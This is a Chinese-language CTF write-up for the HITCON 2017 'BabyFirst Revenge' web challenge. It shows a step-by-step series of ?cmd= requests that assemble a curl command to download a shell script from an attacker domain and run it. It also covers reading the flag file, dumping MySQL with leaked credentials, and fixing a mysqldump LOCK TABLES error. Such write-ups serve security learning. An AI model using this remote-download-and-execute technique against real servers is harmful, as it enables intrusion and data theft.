[HITCON](Web)BabyFirst Revenge

96
王一航
2017.11.06 12:26* 字数 249

Do you remember BabyFirst from HITCON CTF 2015?
This is the harder version!
http://52.199.204.34/


image.png

这种题还是直接说怎么做吧
已知的有两种方法 :

  1. ls -t>[FILENAME]

@zblee 大佬

  1. curl [DOMAIN]>[FILENAME]

其中思路二思路来源于 : @rebirth , 膜大佬


解法一 :

参考文章 :

https://www.leavesongs.com/SHARE/some-tricks-from-my-secret-group.html

给出 Exploit

https://gist.github.com/WangYihang/281fda47bbf7c74fd4e0e34bb5c45454


解法二 :

http://52.199.204.34/?cmd=>cur\
http://52.199.204.34/?cmd=>l\ \
http://52.199.204.34/?cmd=>vvv\
http://52.199.204.34/?cmd=>xx\
http://52.199.204.34/?cmd=>x.x\
http://52.199.204.34/?cmd=>y\
http://52.199.204.34/?cmd=>z\>\
http://52.199.204.34/?cmd=>Z
http://52.199.204.34/?cmd=sh Z

这种方法的限制在于域名 , 需要购买一个符合特定字母顺序的域名

image.png

购买之后添加A记录 , 开启 WEB 服务 , 主页内容为要执行的 shell 脚本即可


拿到 shell 以后的操作

[sniper]=>cat /home/fl4444g/*
[-] Unsupported function!
[+] Executing command on target server...
[+] Result : 
Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr
mysqldump: [Warning] Using a password on the command line interface can be insecure.
mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES
-- MySQL dump 10.13  Distrib 5.7.20, for Linux (x86_64)
--
-- Host: localhost    Database: 
-- ------------------------------------------------------
-- Server version\t5.7.20-0ubuntu0.16.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `fl4gdb`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `fl4gdb` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `fl4gdb`;

报错了 :

mysqldump: Got error: 1044: Access denied for user 'fl4444g'@'%' to database 'fl4gdb' when using LOCK TABLES

比赛的时候时间比较紧急没有研究为什么 , 直接 google 拿到解决方案之后就去看别的题了

解决方案 : https://michaelrigart.be/mysqldump-1044-access-denied-using-lock-tables/

$ mysqldump --single-transaction -u user -p DBNAME > backup.sql

参考文档 : https://dev.mysql.com/doc/refman/5.7/en/mysqldump.html

image.png

http://blog.csdn.net/u013983450/article/details/52179442

CTF
Web note ad 1